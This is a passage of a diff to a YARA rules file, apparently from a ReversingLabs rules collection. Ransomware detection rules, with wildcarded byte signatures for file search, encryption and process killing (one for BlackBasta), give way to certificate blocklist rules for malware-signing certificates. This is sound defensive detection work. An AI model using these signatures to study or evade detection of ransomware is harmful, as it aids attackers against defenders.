?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? - 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? - 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? - 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF B4 24 - ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? - 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? - 50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D - 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50 - 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2 - } - $search_files_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 8B F8 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 - 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 85 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A - ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 - 04 B7 51 50 FF 15 ?? ?? ?? ?? 46 FE 85 ?? ?? ?? ?? D1 EB 75 ?? EB ?? 68 ?? ?? ?? ?? - FF 34 B7 FF 15 ?? ?? ?? ?? 85 C0 74 - } - $encrypt_files_2 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 24 24 ?? 53 55 56 57 E8 ?? ?? ?? ?? 8B D0 8D 4C 24 - ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? - ?? 8B 35 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 7C 24 ?? - FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 7C ?? ?? ?? ?? 8D 44 - 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F8 33 D2 F6 44 - 24 ?? ?? 8B CF 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 - ?? ?? ?? ?? 50 FF D3 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? - 42 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 - 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 - ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 51 6A ?? 5A 8B - CF E8 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? - ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? - ?? ?? 50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 7C 24 ?? 59 8D 44 24 ?? - 50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2 - } - $kill_specific_processes_2 = { - 81 EC ?? ?? ?? ?? 56 57 6A ?? 5E 56 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 - 74 24 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 84 24 ?? - ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 53 55 BE ?? ?? ?? - ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 8B E8 33 D2 85 ED 7E ?? 0F BE 0C 1A E8 ?? ?? ?? ?? 88 04 1A 42 3B D5 7C ?? FF 36 - 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 85 C0 74 ?? 33 DB - 53 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? FF B4 - 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D - 44 24 ?? 50 53 53 68 ?? ?? ?? ?? 53 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? - ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? - ?? ?? ?? 5D 5B 5F 5E 81 C4 ?? ?? ?? ?? C2 - } - $kill_specific_processes_1 = { - 81 EC ?? ?? ?? ?? 55 56 57 6A ?? 5E 56 33 ED 8D 44 24 ?? 55 50 E8 ?? ?? ?? ?? 83 C4 - ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF ?? 0F 84 ?? ?? ?? ?? - 53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 8B 5C - 24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24 ?? 85 C0 7E ?? 8B F8 - 0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24 ?? ?? ?? ?? FF 34 B0 - 55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ?? ?? ?? 7C ?? 8B 7C 24 - ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 50 FF - 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 - ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ?? - ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55 8D 84 24 ?? ?? ?? ?? - 50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? - ?? ?? 57 FF 15 ?? ?? ?? ?? 5B 5F 5E 5D 81 C4 ?? ?? ?? ?? C2 - } - $encrypt_files_3 = { - 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 74 ?? ?? - ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8 ?? ?? ?? - ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ?? - ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF - D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF - D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF 74 24 ?? 8D 84 24 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 84 24 - ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50 55 FF 15 - } - $search_files_2 = { - 53 55 56 57 8B 3D ?? ?? ?? ?? 6A ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B E8 FF 15 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 8D 84 24 ?? ?? - ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 84 24 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? C6 84 - 24 ?? ?? ?? ?? ?? FF D7 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 B5 ?? 51 50 - FF 15 ?? ?? ?? ?? 46 FE 84 24 ?? ?? ?? ?? D1 EB 75 ?? 33 FF 85 F6 7E ?? 8B 9C 24 ?? - ?? ?? ?? 8D 44 24 ?? 2B E8 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8C - 24 ?? ?? ?? ?? 89 48 ?? 8D 0C BD ?? ?? ?? ?? 03 CD 89 58 ?? 8B 4C 0C ?? 89 08 33 C9 - 51 51 50 68 ?? ?? ?? ?? 51 51 FF 15 ?? ?? ?? ?? 89 44 BC ?? 47 3B FE 7C ?? 6A ?? 6A - ?? 8D 44 24 ?? 50 56 FF 15 - } - $kill_specific_processes_3 = { - E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF - ?? 0F 84 ?? ?? ?? ?? 53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 - E8 ?? ?? ?? ?? 8B 5C 24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24 - ?? 85 C0 7E ?? 8B F8 0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24 - ?? ?? ?? ?? FF 34 B0 55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ?? - ?? ?? 7C ?? 8B 7C 24 ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 55 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF - 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 - ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55 - 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 - } - condition: - uint16(0)==0x5A4D and (($search_files_1 and $encrypt_files_1 and $kill_specific_processes_1) or ($search_files_1 and $encrypt_files_2 and $kill_specific_processes_2) or ($search_files_2 and $encrypt_files_3 and $kill_specific_processes_3)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "5000 LIMITED" and (pe.signatures[i].serial=="00:e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" or pe.signatures[i].serial=="e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd") and 1528070400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5B47A4739Dd8Ffe81D9B5307 : INFO FILE { meta: - description = "Yara rule that detects BlackBasta ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7a4ad567-0612-5a9c-8a06-4d615bc7e24a" - date = "2022-12-13" - modified = "2022-12-13" + id = "9688b091-9a77-59c2-b7f9-a8b652201b8f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.BlackBasta.yara#L1-L293" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "79c81a4470e9eabbd714b1a91621c7b2bbe42d5371ba2c799529662d5f5c479a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14694-L14710" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5f35f520d4af26fa648553894a5b0db043d0c32302d94f531b6cb48691396a92" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BlackBasta" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38 - 75 ?? 74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ?? - 74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8B CF 48 8D 54 - 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 85 C0 44 89 74 24 ?? 4C 89 74 24 ?? - 49 0F 45 CE 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CC 45 - 33 C0 33 D2 48 8B CF E8 ?? ?? ?? ?? 8B D8 44 38 74 24 ?? 74 ?? 48 8B 4C 24 ?? E8 ?? - ?? ?? ?? 8B C3 E9 ?? ?? ?? ?? 49 8B 74 24 ?? 49 2B 34 24 48 C1 FE ?? 33 D2 4C 89 75 - ?? 48 8D 4D ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 44 88 75 ?? E8 ?? ?? - ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? 39 48 ?? 75 ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0 - ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38 75 ?? 74 ?? 48 8B 45 - ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0 - ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B - 75 ?? 33 D2 85 C0 49 8B CE 48 0F 45 CA 80 39 ?? 75 ?? 8A 41 ?? 84 C0 75 ?? 38 55 ?? - 74 ?? 49 8B CE E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 38 51 ?? 74 ?? 4D 8B CC 4D 8B C5 48 - 8B D7 E8 ?? ?? ?? ?? 44 8B E8 85 C0 75 ?? 38 45 ?? 74 ?? 49 8B CE E8 ?? ?? ?? ?? 4C - 8B 6C 24 ?? 48 8D 55 ?? 48 8B CB FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 0F 85 ?? ?? ?? ?? - 49 8B 04 24 49 8B 54 24 ?? 48 2B D0 48 C1 FA ?? 48 3B F2 74 ?? 48 2B D6 48 8D 0C F0 - 4C 8D 0D ?? ?? ?? ?? 45 8D 46 ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 44 38 74 - 24 ?? 74 ?? 48 8B 4C 24 - } - $find_system_volumes_v1_p1 = { - 48 89 4C 24 ?? 55 53 56 57 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? - 48 8B F1 45 33 FF 44 89 7C 24 ?? 4C 89 39 4C 89 79 ?? 4C 89 79 ?? C7 44 24 ?? ?? ?? - ?? ?? BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 0F 1F 00 4C 8D 8D ?? - ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 44 89 7C 24 ?? 4C 89 7C 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 - ?? 4C 89 7C 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 8D 14 00 48 8D BD ?? ?? ?? ?? 48 03 FA 4C 89 7C 24 ?? 4C 89 - 7C 24 ?? 4C 89 7C 24 ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 - 8D 9D ?? ?? ?? ?? 48 D1 FA 48 83 FA ?? 72 ?? 45 33 C0 48 8D 4C 24 ?? E8 - } - $find_system_volumes_v1_p2 = { - 4C 89 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 3B C7 74 - ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 44 0F B6 0B 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 3B - CA 73 ?? 48 8D 41 ?? 48 89 44 24 ?? 48 8D 44 24 ?? 48 83 FA ?? 48 0F 43 44 24 ?? 44 - 88 0C 08 C6 44 08 ?? ?? EB ?? 45 33 C0 41 8D 50 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 - 83 C3 ?? 48 3B DF 75 ?? 4C 89 BD ?? ?? ?? ?? 48 8B 46 ?? 48 3B 46 ?? 74 ?? 4C 89 38 - 4C 89 78 ?? 4C 89 78 ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 4C - 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 44 - 24 ?? 48 8B D0 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 FF C2 - 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 - 48 83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? - ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 48 8B C6 48 81 C4 - } - $set_default_icon_p1 = { - 48 89 5C 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? - 48 8B F1 45 33 ED 44 89 6C 24 ?? 4C 8B 35 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 4C 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B C8 49 2B CE 49 3B CF 0F 82 ?? ?? - ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 4C 0F 43 25 ?? ?? ?? ?? 4C 89 6C - 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 4B 8D 2C 37 BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 3B - EB 0F 86 ?? ?? ?? ?? 48 8B DD 48 83 CB ?? 48 3B D8 76 ?? 48 8B D8 48 B8 ?? ?? ?? ?? - ?? ?? ?? ?? 48 8D 0C 00 EB ?? B8 ?? ?? ?? ?? 48 3B D8 48 0F 42 D8 48 8D 4B ?? 48 B8 - ?? ?? ?? ?? ?? ?? ?? ?? 48 3B C8 0F 87 ?? ?? ?? ?? 48 03 C9 48 81 F9 ?? ?? ?? ?? 72 - ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? - ?? ?? ?? 48 8D 78 ?? 48 83 E7 ?? 48 89 47 ?? EB ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48 - 8B F8 EB ?? 49 8B FD 48 89 7C 24 ?? 48 89 6C 24 ?? 48 89 5C 24 ?? 4B 8D 1C 36 4C 8B - } - $set_default_icon_p2 = { - C3 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 48 8D 0C 3B 4F 8D 04 3F 48 8D 15 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 66 44 89 2C 6F BB ?? ?? ?? ?? 89 5C 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ?? - ?? 48 0F 43 54 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? - 48 89 44 24 ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 45 33 C9 45 33 - C0 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CE 48 83 7E ?? ?? 72 ?? - 48 8B 0E 8B 46 ?? 03 C0 89 44 24 ?? 48 89 4C 24 ?? 44 8B CB 45 33 C0 48 8D 15 ?? ?? - ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 B9 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? EB ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 4C 24 - ?? 45 33 C9 44 8B C0 33 D2 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E3 ?? 89 5C 24 ?? 48 - 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B C1 48 81 - FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 77 ?? - E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 44 89 6C 24 ?? 48 8B CE - E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C - 5F 5E 5D C3 - } - $cmd_prompt = { - 48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8B EC 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 - 48 89 45 ?? 48 8B D9 4C 8D 05 ?? ?? ?? ?? 33 FF 48 8D 4D ?? 33 D2 48 89 7D ?? E8 ?? - ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8B 4D ?? 48 85 C9 0F 84 ?? ?? - ?? ?? 33 D2 E8 ?? ?? ?? ?? 48 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 85 DB 40 0F 94 C7 E9 ?? - ?? ?? ?? 48 8B 45 ?? 48 8D 0D ?? ?? ?? ?? 48 89 45 ?? 48 89 4D ?? 48 89 5D ?? 48 89 - 7D ?? 48 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 18 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 33 C9 - 89 38 48 8B 55 ?? E8 ?? ?? ?? ?? 48 8B F8 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? 89 18 EB ?? - E8 ?? ?? ?? ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ?? 48 8B 4D ?? E8 ?? ?? ?? - ?? 83 CF ?? EB ?? E8 ?? ?? ?? ?? 89 18 48 8D 15 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 48 - 89 55 ?? 33 C9 E8 ?? ?? ?? ?? 48 8B F8 48 8B 4D ?? E8 ?? ?? ?? ?? 8B C7 48 8B 4D ?? - 48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 5D C3 - } - $exclude_from_encryption = { - 66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? 